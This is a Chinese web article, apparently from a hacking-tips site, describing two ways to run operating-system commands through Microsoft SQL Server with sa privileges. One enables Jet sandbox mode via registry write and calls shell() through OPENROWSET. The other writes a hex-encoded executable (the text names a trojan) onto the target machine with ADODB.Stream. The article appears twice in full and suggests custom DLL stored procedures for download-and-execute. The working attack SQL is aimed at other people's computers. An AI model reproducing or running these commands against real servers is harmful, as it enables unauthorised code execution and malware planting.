MSSQL中两种特别的执行命令的方法
38人参与 • 2011-03-28 • 脚本攻防
以下方法都以需要sa权限为前提。
1, 沙盒模式的变通.
原始方法:
第一句开启沙盘模式:exec master..xp_regwrite ’hkey_local_machine’,’software\microsoft\jet\4.0\engines’,’sandboxmode’,’reg_dword’,1
复制代码第二句利用jet.oledb执行系统命令:select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\dnary.mdb’,’select shell("cmd命令")’)
复制代码或select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\ias.mdb’,’select shell("cmd命令")’)
复制代码但是,当 x:\windows\system32\ias\dnary.mdb 或 x:\windows\system32\ias\ias.mdb 被删除时,命令就会无效了.
所以利用以下语句创建一个数据库:(数据库名syssetup.xml,后缀.xml是自定义,不影响使用.)
declare @hr int
declare @object int;declare @property int
exec @hr = sp_oacreate ’adox.catalog’,@object output
exec @hr = sp_oamethod @object,’create’,@property output,’provider=microsoft.jet.oledb.4.0;data source=syssetup.xml’
然后再利用jet.oledb调用syssetup.xml执行系统命令:select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=syssetup.xml’,’select shell("cmd命令")’)
2, 直接写入文件到对方计算机,此处的文件可以是exe, dll,等.(注,此方法不支持文件大于64kb)
当已经有一个程序需要放到对方计算机的时候.(例如, 放ma。)
将这个文件转成hex代码。
如果不知道怎么把文件转成hex代码,请使用下面的工具.
file2hex.rar (424 bytes)
使用方法很简单, 解压出来之后, 把要转的文件拖到脚本上去, 就会生成包含hex代码的文本.
然后用以下方法写入到对方计算机中。
declare @objecttoken int
exec sp_oacreate ’adodb.stream’, @objecttoken output
exec sp_oasetproperty @objecttoken, ’type’, 1
exec sp_oamethod @objecttoken, ’open’
exec sp_oamethod @objecttoken, ’write’, null, 0x123456(其中0x123456为hex内容)
exec sp_oamethod @objecttoken, ’savetofile’, null, ’test.exe(文件名)’, 2
exec sp_oamethod @objecttoken, ’close’
exec sp_oadestroy @objecttoken
写入之后, 就发挥你的办法去执行你写入的这个文件就ok了。
集思广益:
现在很多计算机可以执行命令的方法都被人封得抓狂,就算有幸可以执行,也有可能cmd被改了权限..
所以我推荐的办法是有能力的同学自己开发dll,然后把dll写入到对方计算机中,再注册为存储过程.
至于存储过程的功能. 可以是下载程序并执行, 可以是直接执行命令. 当然这个看你自己了.
1, 沙盒模式的变通.
原始方法:
第一句开启沙盘模式:exec master..xp_regwrite ’hkey_local_machine’,’software\microsoft\jet\4.0\engines’,’sandboxmode’,’reg_dword’,1
复制代码第二句利用jet.oledb执行系统命令:select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\dnary.mdb’,’select shell("cmd命令")’)
复制代码或select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\ias.mdb’,’select shell("cmd命令")’)
复制代码但是,当 x:\windows\system32\ias\dnary.mdb 或 x:\windows\system32\ias\ias.mdb 被删除时,命令就会无效了.
所以利用以下语句创建一个数据库:(数据库名syssetup.xml,后缀.xml是自定义,不影响使用.)
复制代码
代码如下:declare @hr int
declare @object int;declare @property int
exec @hr = sp_oacreate ’adox.catalog’,@object output
exec @hr = sp_oamethod @object,’create’,@property output,’provider=microsoft.jet.oledb.4.0;data source=syssetup.xml’
然后再利用jet.oledb调用syssetup.xml执行系统命令:select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=syssetup.xml’,’select shell("cmd命令")’)
2, 直接写入文件到对方计算机,此处的文件可以是exe, dll,等.(注,此方法不支持文件大于64kb)
当已经有一个程序需要放到对方计算机的时候.(例如, 放ma。)
将这个文件转成hex代码。
如果不知道怎么把文件转成hex代码,请使用下面的工具.
file2hex.rar (424 bytes)
使用方法很简单, 解压出来之后, 把要转的文件拖到脚本上去, 就会生成包含hex代码的文本.
然后用以下方法写入到对方计算机中。
复制代码
代码如下:declare @objecttoken int
exec sp_oacreate ’adodb.stream’, @objecttoken output
exec sp_oasetproperty @objecttoken, ’type’, 1
exec sp_oamethod @objecttoken, ’open’
exec sp_oamethod @objecttoken, ’write’, null, 0x123456(其中0x123456为hex内容)
exec sp_oamethod @objecttoken, ’savetofile’, null, ’test.exe(文件名)’, 2
exec sp_oamethod @objecttoken, ’close’
exec sp_oadestroy @objecttoken
写入之后, 就发挥你的办法去执行你写入的这个文件就ok了。
集思广益:
现在很多计算机可以执行命令的方法都被人封得抓狂,就算有幸可以执行,也有可能cmd被改了权限..
所以我推荐的办法是有能力的同学自己开发dll,然后把dll写入到对方计算机中,再注册为存储过程.
至于存储过程的功能. 可以是下载程序并执行, 可以是直接执行命令. 当然这个看你自己了.
赞 (0)
打赏
微信扫一扫
微信扫一扫
您想发表意见!!点此发布评论
发表评论